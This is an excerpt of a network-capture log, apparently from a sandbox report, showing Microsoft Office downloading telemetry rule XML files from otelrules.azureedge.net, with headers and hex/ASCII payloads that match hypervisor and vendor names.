
Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.4	49802	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:22 UTC	192	OUT	GET /rules/rule120650v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:22 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:22 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989EE75B" x-ms-request-id: e8f57c1b-901e-0016-2be4-41efe9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114822Z-174f7845968cdxdrhC1EWRg0en000000118g000000008eb7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:22 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.4	49803	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:22 UTC	192	OUT	GET /rules/rule120651v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:22 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:22 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: ab991284-101e-005a-2ab3-42882b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114822Z-174f784596886s2bhC1EWR743w00000011dg000000005h3m x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:22 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.4	49804	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:22 UTC	192	OUT	GET /rules/rule120652v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:22 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:22 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97E6FCDD" x-ms-request-id: dcf51672-d01e-005a-5c91-3f7fd9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114822Z-174f7845968zgtf6hC1EWRqd8s0000000u8g000000008sxs x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:22 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.4	49805	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:22 UTC	192	OUT	GET /rules/rule120653v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:22 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:22 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C710B28" x-ms-request-id: 5cf18767-601e-000d-7d91-3f2618000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114822Z-174f7845968kdththC1EWRzvxn0000000dsg00000000492w x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:22 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.4	49807	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:24 UTC	192	OUT	GET /rules/rule120655v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:24 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:24 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7F164C3" x-ms-request-id: 926e5261-401e-008c-1d9e-4286c2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114824Z-174f78459685m244hC1EWRgp2c000000114g000000009cee x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-30 11:48:24 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.4	49806	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:24 UTC	192	OUT	GET /rules/rule120654v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:24 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:24 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT ETag: "0x8DC582BA54DCC28" x-ms-request-id: 7af319f3-d01e-0017-6a91-3fb035000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114824Z-174f7845968ljs8phC1EWRe6en00000011ag0000000013sx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:24 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.4	49809	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:24 UTC	192	OUT	GET /rules/rule120657v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:24 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:24 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT ETag: "0x8DC582B9FF95F80" x-ms-request-id: bf7ba01b-c01e-007a-6b4e-41b877000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114824Z-174f7845968jrjrxhC1EWRmmrs00000011h0000000004wvk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:24 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.4	49808	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:24 UTC	192	OUT	GET /rules/rule120656v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:25 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:24 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT ETag: "0x8DC582BA48B5BDD" x-ms-request-id: f73eacfc-701e-0001-0b91-3fb110000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114824Z-174f7845968kvnqxhC1EWRmf3g0000000n500000000071wq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:25 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.4	49810	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:24 UTC	192	OUT	GET /rules/rule120658v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:25 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:24 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT ETag: "0x8DC582BB650C2EC" x-ms-request-id: 9fbcff65-e01e-0099-19a3-42da8a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114824Z-174f7845968vqt9xhC1EWRgten00000011c0000000007q50 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:25 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.4	49811	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:26 UTC	192	OUT	GET /rules/rule120659v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:26 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:26 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3EAF226" x-ms-request-id: 3ccb05f8-401e-0016-1b69-3f53e0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114826Z-174f7845968vqt9xhC1EWRgten00000011eg000000004env x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:26 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.4	49812	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:26 UTC	192	OUT	GET /rules/rule120660v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:27 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:26 GMT Content-Type: text/xml Content-Length: 485 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT ETag: "0x8DC582BB9769355" x-ms-request-id: e579458c-401e-0064-1dbd-4254af000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114826Z-174f7845968psccphC1EWRuz9s00000011ng000000005m87 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-30 11:48:27 UTC	485	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.4	49813	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:26 UTC	192	OUT	GET /rules/rule120661v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:27 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:26 GMT Content-Type: text/xml Content-Length: 411 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989AF051" x-ms-request-id: 4d2a6959-e01e-0085-41b2-42c311000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114826Z-174f7845968cpnpfhC1EWR3afc00000010zg000000006qeg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:27 UTC	411	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d Data Ascii: <?xml 